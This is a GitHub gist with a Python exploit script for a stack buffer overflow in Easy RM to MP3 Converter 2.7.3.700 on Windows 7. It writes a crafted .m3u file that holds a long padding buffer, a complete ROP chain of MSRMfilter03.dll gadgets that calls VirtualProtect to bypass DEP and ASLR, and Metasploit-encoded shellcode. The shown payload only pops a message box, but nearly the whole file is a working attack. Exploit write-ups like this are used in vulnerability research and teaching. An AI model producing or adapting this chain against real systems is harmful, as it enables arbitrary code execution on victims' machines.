Created
November 10, 2012 21:29
-
-
Save synap5e/4052581 to your computer and use it in GitHub Desktop.
Easy RM to MP3 Converter - ".m3u" Windows 7 DEP + ASLR Local Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Easy RM to MP3 Converter - Windows 7 DEP + ASLR Local Exploit | |
# Version 2.7.3.700 on Windows 7 | |
# Tested: Windows 7 Ultimate SP0 - English | |
# Author: Simon Pinfold | |
import struct, os | |
# | |
# windows/messagebox - 287 bytes | |
# http://www.metasploit.com | |
# Encoder: x86/shikata_ga_nai | |
# VERBOSE=false, EXITFUNC=process, TITLE=Check, TEXT=Code | |
# Execution!, ICON=NO | |
# Badchars = '\x00\xff\x0a\x0d' | |
# | |
payload = ( "\xbb\x5c\x96\xd6\x1f\xd9\xc5\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" | |
"\x42\x31\x5e\x13\x83\xc6\x04\x03\x5e\x53\x74\x23\xc6\x80\xe3" | |
"\x15\x8d\x72\xe0\x97\xbc\xc8\x7f\xe9\x89\x48\x0b\x78\x3a\x1b" | |
"\x7d\x77\xb1\x6d\x9e\x0c\x83\x99\x15\x6c\x2c\x12\x1f\xa9\x63" | |
"\x3c\x15\x3a\x22\x3d\x04\x43\x34\x5d\x2d\xd0\x93\xb9\xba\x6c" | |
"\xe0\x4a\xe8\x46\x60\x4d\xfb\x1c\xda\x55\x70\x78\xfb\x64\x6d" | |
"\x9e\xcf\x2f\xfa\x55\xbb\xae\x12\xa4\x44\x81\x2a\x3b\x16\x65" | |
"\x6a\xb0\x60\xa4\xa4\x34\x6e\xe1\xd0\xb3\x4b\x91\x02\x14\xd9" | |
"\x88\xc0\x3e\x05\x4b\x3c\xd8\xce\x47\x89\xae\x8b\x4b\x0c\x5a" | |
"\xa0\x77\x85\x9d\x5f\xfe\xdd\xb9\x83\x61\x1d\x73\xb3\x48\x75" | |
"\xfd\x21\x03\xb7\x96\x27\x5d\x36\x8b\x6a\x89\xd9\xac\x74\xb6" | |
"\x6f\x17\x8f\xf3\x0e\x40\x6d\x70\x68\x6c\x56\x24\x9e\x03\x69" | |
"\x37\xa1\x95\xd3\xcf\x36\xca\xb7\xef\x87\x7a\x7b\xdd\x29\x1f" | |
"\x13\x54\x45\xba\x91\x1e\xf5\x60\x5c\x97\xe0\x3f\x9f\xf2\xe8" | |
"\x36\x9d\xac\x4b\xe0\x80\x01\x10\x76\xd8\xbd\x3a\x91\x80\x42" | |
"\x45\x9e\x2b\xd7\xe2\x41\x8c\x4f\x50\xea\xa9\xec\x67\x31\xb9" | |
"\xae\xa3\xc0\x33\xad\xc4\xa5\x2d\x10\x4d\x52\xd1\x27\x19\xcb" | |
"\x7d\xe7\xa4\x73\x1b\x8f\x65\xeb\x87\x2a\x5b\x3a\xcf\xf8\xbf" | |
"\xb3\x59\xe1\xf1\x19\x33\xd1\xa2\xcc\x96\xee\x95\xde\xd6\x40" | |
"\xe9\x74\xdf" ) | |
buffer = 'A' * 26088 | |
buffer += struct.pack('<I', 0x1001e802) # RETN (ROP NOP) [MSRMfilter03.dll] | |
buffer += 'A' * 4 | |
####################################### EDI = kernel32.dll.virtualprotect ######################################## | |
# Clobbers: EAX, ESI, EBX | |
buffer += struct.pack('<I', 0x10029822) # POP EAX # RETN ** [MSRMfilter03.dll] | |
buffer += struct.pack('<I', 0x10032048) # (MSRMfilter03.dll - IAT 0x10032048 : kernel32.dll.terminateprocess (0x76af509b), offset to kernel32.dll.virtualprotect (0x76af50ab) : 16 | |
# EAX = &kernel32.dll.terminateprocess | |
buffer += struct.pack('<I', 0x1002e0c8) # MOV EAX,DWORD PTR DS:[EAX] # RETN ** [MSRMfilter03.dll] | |
# EAX = kernel32.dll.terminateprocess | |
for i in range(0, 16): | |
buffer += struct.pack('<I', 0x10023327) # INC EAX # RETN ** [MSRMfilter03.dll] | |
# EAX = kernel32.dll.virtualprotect | |
buffer += struct.pack('<I', 0x100128f7) # PUSH EAX # POP EDI # POP ESI # POP EBX # RETN ** [MSRMfilter03.dll] | |
buffer += "A" * (4 * 2) | |
# EDI = kernel32.dll.virtualprotect (for now) | |
########################################################################################################## | |
# EDI = kernel32.dll.virtualprotect | |
################################ put a pushad gadget at ESP+0x100 on the stack ########################### | |
# Clobbers: EAX, ESI, EDX, EBP | |
buffer += struct.pack('<I', 0x10029822) # POP EAX # RETN ** [MSRMfilter03.dll] | |
buffer += struct.pack('<I', 0xC91F1A34) | |
buffer += struct.pack('<I', 0x1002c67a) # XOR EAX,C95E1005 # RETN ** [MSRMfilter03.dll] | |
# EAX = 0x00410a31 : pushad | startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] | |
buffer += struct.pack('<I', 0x10024e95) # PUSH EAX # PUSH SS # ADD AL,10 # POP ECX # POP ECX # RETN ** [MSRMfilter03.dll] | |
# ECX = 0x00410a31 : pushad | startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] | |
buffer += struct.pack('<I', 0x1002d63c) # POP EDX # RETN ** [MSRMfilter03.dll] | |
buffer += struct.pack('<I', 0x10066931) # &Writable location [MSRMfilter03.dll] | |
buffer += struct.pack('<I', 0x1002e892) # PUSH ESP # AND AL,10 # POP ESI # MOV DWORD PTR DS:[EDX],ECX # RETN ** [MSRMfilter03.dll] | |
buffer += struct.pack('<I', 0x1002bc28) # XOR EAX,EAX # RETN ** [MSRMfilter03.dll] | |
buffer += struct.pack('<I', 0x1002f703) # ADD EAX,ESI # POP ESI # RETN ** [MSRMfilter03.dll] | |
buffer += "A" * 4 | |
# EAX = ESP | |
# ESI = ESP | |
buffer += struct.pack('<I', 0x1002dc4c) # ADD EAX,100 # POP EBP # RETN ** [MSRMfilter03.dll] | |
buffer += "A" * 4 | |
# EAX = ESP + 0x100 | |
buffer += struct.pack('<I', 0x10030bb8) # MOV DWORD PTR DS:[EAX+4],ECX # RETN ** [MSRMfilter03.dll] | |
# [EAX + 4] = 0x00410a31 : pushad | startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] | |
########################################################################################################## | |
# EDI = kernel32.dll.virtualprotect | |
################################## ESI = kernel32.dll.virtualprotect (from EDI) ########################## | |
# Clobbers: EAX, EBP, EBX, ECX, EDI (duh) | |
buffer += struct.pack('<I', 0x1002c323) # XOR EAX,EAX # RETN ** [MSRMfilter03.dll] | |
buffer += struct.pack('<I', 0x10011105) # MOV EAX,EDI # POP EDI # POP ESI # POP EBX # RETN ** [MSRMfilter03.dll] | |
buffer += "A" * (4 * 3) | |
buffer += struct.pack('<I', 0x1001a788) # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN ** [MSRMfilter03.dll] | |
buffer += "A" * (4 * 3) | |
################################################################################################################## | |
# ESI = kernel32.dll.virtualprotect | |
################################## EBP = ReturnTo (ptr to jmp esp), EDX = 0x40 ########################### | |
# Clobbers: EBX | |
buffer += struct.pack('<I', 0x1002c323) # XOR EAX,EAX # RETN ** [MSRMfilter03.dll] | |
buffer += struct.pack('<I', 0x1002dc41) # ADD EAX,40 # POP EBP # RETN ** [MSRMfilter03.dll] | |
buffer += struct.pack('<I', 0x1001b058) # & push esp # ret [MSRMfilter03.dll] | |
# EBP = ReturnTo (ptr to jmp esp) | |
buffer += struct.pack('<I',0x100253bc) # XOR EDX,EDX # RETN ** [MSRMfilter03.dll] | |
buffer += struct.pack('<I', 0x1001bdee) # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN ** [MSRMfilter03.dll] | |
buffer += "A" * 8 | |
buffer += struct.pack('<I', 0x10024ece) # ADD EDX,EBX # POP EBX # RETN 10 ** [MSRMfilter03.dll] | |
buffer += "A" * 4 | |
# EDX = NewProtect (0x40) | |
########################################################################################################## | |
# ESI = kernel32.dll.virtualprotect | |
# EBP = ReturnTo (ptr to jmp esp) | |
# EDX = 0x40 | |
############################################## EBX = dwSize (0x200) ###################################### | |
# Clobbers: EAX | |
buffer += struct.pack('<I', 0x1002b93e) # POP EAX # RETN [MSRMfilter03.dll] | |
buffer += "A" * 0x10 | |
buffer += struct.pack('<I', 0xC424CEf0) | |
buffer += struct.pack('<I', 0x1002a14b) # ADD EAX,3BDB3310 # RETN ** [MSRMfilter03.dll] | |
#EAX = 0x200 | |
buffer += struct.pack('<I', 0x1001bdee) # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] | |
buffer += "A" * 8 # ESP addition | |
# EBX = dwSize | |
########################################################################################################## | |
# ESI = kernel32.dll.virtualprotect | |
# EBP = ReturnTo (ptr to jmp esp) | |
# EDX = 0x40 | |
# EBX = dwSize (0x200) | |
################################### ECX = &Writable location [MSRMfilter03.dll ]########################## | |
# Clobbers: | |
buffer += struct.pack('<I', 0x1001b1df) # POP ECX # RETN [MSRMfilter03.dll] | |
buffer += struct.pack('<I', 0x10066931) # &Writable location [MSRMfilter03.dll] | |
# ECX = writable location | |
########################################################################################################## | |
# ESI = kernel32.dll.virtualprotect | |
# EBP = ReturnTo (ptr to jmp esp) | |
# EDX = 0x40 | |
# EBX = dwSize (0x200) | |
# ECX = &Writable location [MSRMfilter03.dll ] | |
################################################# EDI = ROP NOP ########################################## | |
# Clobbers: | |
buffer += struct.pack('<I', 0x1002c051) # POP EDI # RETN [MSRMfilter03.dll] | |
buffer += struct.pack('<I', 0x1001e802) # RETN (ROP NOP) [MSRMfilter03.dll] | |
# EDI = ROP NOP (RETN) | |
########################################################################################################## | |
# ESI = kernel32.dll.virtualprotect | |
# EBP = ReturnTo (ptr to jmp esp) | |
# EDX = 0x40 | |
# EBX = dwSize (0x200) | |
# ECX = &Writable location [MSRMfilter03.dll ] | |
# EDI = ROP NOP | |
################################################### EAX = NOPs ########################################### | |
# Clobbers: | |
buffer += struct.pack('<I', 0x1002b93e) # POP EAX # RETN [MSRMfilter03.dll] | |
buffer += "\x90" * 4 | |
########################################################################################################## | |
# ESI = kernel32.dll.virtualprotect | |
# EBP = ReturnTo (ptr to jmp esp) | |
# EDX = 0x40 | |
# EBX = dwSize (0x200) | |
# ECX = &Writable location [MSRMfilter03.dll ] | |
# EDI = ROP NOP | |
# EAX = NOPs | |
for i in range(0, 25): | |
buffer += struct.pack('<I', 0x1001e802) # RETN (ROP NOP) [MSRMfilter03.dll] | |
buffer += "\x11" * 4 # Overwritten with 0x00410a31 : pushad | startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] | |
buffer += "\x90" * 20 | |
buffer += payload | |
buffer += "C" * (30000 - len(buffer)) | |
name = "file.m3u" | |
if os.path.exists(name): | |
os.remove(name) | |
f = file(name, "w") | |
f.write(buffer) | |
f.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment